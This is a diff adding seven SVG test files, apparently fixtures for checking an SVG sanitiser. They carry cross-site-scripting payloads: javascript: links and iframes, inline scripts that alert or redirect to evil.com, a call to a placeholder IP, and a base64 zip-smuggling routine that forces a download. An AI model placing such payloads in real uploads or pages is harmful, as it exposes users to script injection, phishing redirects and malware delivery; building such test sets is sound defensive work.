Test files

1.svg

@@ -0,0 +1,5 @@
+<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
+  <a href="javascript:alert(document.domain)">
+    <text x="50" y="50" text-anchor="middle">Lauritz</text>
+  </a>
+</svg>

2.svg

@@ -0,0 +1,6 @@
+<svg width="500" height="500" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+        <text x="20" y="35">Lauritz</text>
+        <foreignObject width="500" height="500">
+                <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:confirm(document.domain);" width="400" height="250"/>
+        </foreignObject>
+</svg>

3.svg

@@ -0,0 +1,14 @@
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
+http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
+stroke="#004400"/>
+   <script type="text/javascript">
+      alert("You have been hacked!!")
+
+
+      window.location.href="https://evil.com"
+   </script>
+</svg>

4.svg

@@ -0,0 +1,4 @@
+<svg xmlns="http://www.w3.org/2000/svg"
+     xmlns:xlink="http://www.w3.org/1999/xlink">
+  <image xlink:href="http://xxx.xxx.xxx.xxx:2333" />
+</svg>

5.svg

@@ -0,0 +1,7 @@
+<svg width="0" height="0" xmlns="http://www.w3.org/2000/svg">
+  <script type="application/javascript">
+    <![CDATA[
+      // Malicious JavaScript payload here
+    ]]>
+  </script>
+</svg>

6.svg

@@ -0,0 +1,43 @@
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg height="100%" version="1.1" viewBox="0 0 1700 863" width="100%" xml:space="preserve"
+  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <script type="text/javascript">
+    <![CDATA[
+      function b64blb(b64Data, sliceSize)
+      {
+        var byteArrays = [];
+        var byteCharacters = atob(b64Data);
+    
+        for(var offset = 0; offset < byteCharacters.length; offset += sliceSize)
+        {
+          var slice = byteCharacters.slice(offset, offset + sliceSize);
+          var byteNumbers = new Array(slice.length);
+    
+          for(var i = 0; i < slice.length; i++)
+          {
+            byteNumbers[i] = slice.charCodeAt(i);
+          }
+    
+          var byteArray = new Uint8Array(byteNumbers);
+          byteArrays.push(byteArray);
+        }
+    
+        var blob = new Blob(byteArrays, {type: "application/zip"});
+        return blob;
+      }
+    
+      function newFile(blob)
+      {
+        let file = new File([blob], "test.zip", {type: "application/zip"});
+        let expurl = URL["createObjectURL"](file);
+        window.location.assign(expurl);
+        URL.revokeObjectURL(expurl);
+      }
+    
+      var content = 'BASE64_ZIP_CONTENT';
+      var blob = b64blb(content, 512);
+      newFile(blob);
+    
+    ]]>
+  </script>
+</svg>

7.svg

@@ -0,0 +1,9 @@
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.domain);
+   </script>
+</svg>